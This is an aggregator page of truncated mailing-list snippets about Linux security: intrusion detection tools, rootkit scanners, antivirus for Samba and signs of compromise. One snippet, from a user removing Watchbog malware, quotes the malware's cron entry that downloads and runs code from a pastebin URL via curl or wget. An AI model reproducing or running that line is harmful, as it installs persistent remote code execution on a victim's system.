similar to: Internet threat management package

What would be a good POP daemon to use? I know there are a few in the mail ports. Are they any good? What I mean by good is 'secure as possible' (is there really such thing as being totally secure / invulnerable?) Cheers

Hello all, I have been exploring the various intrusion detection systems available for the Linux platform and was wondering what ones you all would recommend? I have used AIDE before and while it is extremely easy to setup, it does not support the ability to send alerts as files are changed (allows one to be aware of an intrusion almost immediately). Thank you, Dan Burkland ?

Starting with a fresh load and after I finish hardening the load following the Center for Internet Security (CIS) guidance, I'm wondering whether AIDE or OSSEC would be a better intrusion detection system. I installed AIDE and did a quick test of AIDE and after initializing the db and applying the recent cups update, I found that 1700+ files had changed. Those are a lot of changes to wade

On Wednesday 23 August 2006 07:25, wine-users-request@winehq.org wrote: > you can't double click an exe, you have > to run it with wine, ie "wine game.exe". there is a way to make it so that > you can double click exe files, but that way makes your system vulnerable > to windows virii, so you should really stick to the standard. On my Debian Sid system, I CAN double

How do you know when a Linux system has been compromised?? Every day I watch our systems with all the typical tools, ps, top, who, I watch firewall / IPS logs, I have logwatch setup and mailing daily summaries to me and I dive deeper into logs if something looks suspicious. What am I missing or not looking at that you security gurus are looking at? I subscribe to the centos and SANS

Just wondering if anyone has thoughts (good or bad) about this product (RAV AntiVirus for Samba (Linux i386))...or any other? I have a client that wants to have A/V *on* their samba server, rather than just scanning the shares from a WS. Any comments regarding ANTIVIRUS PROTECTION and SAMBA are gratefully welcome! TIA -Ryan Beisner

Just wanted to let you (the devs) know, that if I have Kaspersky Antivirus 2010 installed on my XP, I will get these 4 errors in the kernel32:toolhelp test: toolhelp.c:178: Test failed: couldn't find self in thread list toolhelp.c:179: Test failed: couldn't find sub-process thread's in thread list toolhelp.c:195: Test failed: couldn't find self in thread list toolhelp.c:196: Test

Hello; I'm running a FreeBSD 4.10-release-p2 box and both chkrootkit 0.44 & 0.45 report that my /sbin/init file is infected. It appears as though the egrep for "UPX" in the output of "strings" triggers the infected notice. When I copy the init file from an uninfected box to this one chkrootkit continues to report it as infected. Is chkrootkit reading a copy of the

On Monday, 19 November 2007, Ross S. W. Walker rwalker at medallion.com wrote: <snip> > You can fix it all from CentOS. Ross: In addition to coming up with another slick way to fix this box, which I truly appreciate, you came up with the below: >You need to run some kind of rootkit detection and cleaner on the >system before it reboots or else it will just reinstall itself.

Puppet custom functions and user permissions I am busy writing a custom function to automatically add OSSEC agents to a OSSEC server after installation. Unfortunately, it seems that puppetmasterd is not respecting the entries in /etc/group in linux. No matter how many other groups the puppet user has been added to in /etc/ group, when puppetmasterd runs the custom function the effective/real user

Hi Sir, I have a question regarding the security of Xen. What are the security threats in with Intel VT-x. Thanks, Praveen Kushwaha ________________________________________________________________________ _____________________ NEC HCL System Technologies Ltd., 4th Floor, Tower B, Logix Techno Park, Noida | Tel: 120 436 6777 Extn 748

This morning, I noticed in my security email, that my entire /usr/bin directory had setuid diff's set on them. I think I've been hacked. So I installed chkrootkit from ports and ran it. It showed not infected for everything, except NETSTAT. NETSTAT showed infected... I ran chkrootkit for another machine (at my office), and it showed not infected for everything. Both machines are

Hi, Is there a way to find out how the CentOS 7.5 Linux box got infected with malware? Currently i am referring to http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html to carry out the below steps and is done manually. 1)rm -fr /tmp/*timesyncc.service* 2)crontab -e -u apigee delete the cron entry */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget

Anyone wanna explain why ClamAV thinks Wine has a rootkit in it? It finds "mountmgr.sys" and "usbd.sys" as "BC.Heuristics.Rootkit.B" This is not altered Wine.. or even used... but it happens just pure straight up compile from source Wine even if its never been ran.... its finding them in the fakedlls folder. I have not tried on Linux, only on Mac OS X, using the

If you are using Microsoft Outlook and you are reading this message you need to make 500% sure you are not propagating virii. I posted our support (at) nufone d0t net addy on this mailing list last night and have never posted it in an unprotected fashion like that anywhere else. So far today we have received over a hundred email virii to that address. I suggest you upgrade to a more secure

We are using samba to give our NT users access to our UNIX servers (running Solaris 2.5.1) and to give our UNIX users, using Wincenter, access to their UNIX directories. We want to be able to run a virus checker (Network Associates VirusScan) from a NT 4.0 workstation and have it check the samba (UNIX directories). Since we want to centralize this activity, I want to be"root" on the

Hi Friends! I need to prepare a script which will grep logs from the current time to previous 5 mins that is if the current time is Mon Jun 13 12:40:40 IST 2011 then all the logs between the interval Mon Jun 12:35 - 12:40 2011 should be grepped by the script and append it to another file. However, the below script is not able to grep the desired logs, so I need some help in preparing the script.

Situation: We are providing hosting services. I've grown tired of the various kiddie scripts/dictionary attacks on various services. The latest has been against vsftpd, on systems that I can't easily control vs. putting strict limits on ssh. We simply have too many users entering from too many networks many with dynamic IP addresses. Enter.... thinking about LIDS or Log Based

Hi all, I need to install an anti-rootkid in a lot of servers. I know that there're several options: tripwire, aide, chkrootkit... ?What do you prefer? Obviously, I have to define my needs: - easy setup and configuration - actively developed -- Thanks, Jordi Espasa Clofent

On Fri, June 12, 2015 3:54 pm, jd1008 wrote: > > > On 06/12/2015 02:32 PM, Valeri Galtsev wrote: >> On Fri, June 12, 2015 3:20 pm, John R Pierce wrote: >>> On 6/12/2015 1:03 PM, Valeri Galtsev wrote: >>>> But the bottom line is the same: in both cases you are executing >>>> somebody's else code on your computer. >>> >>> your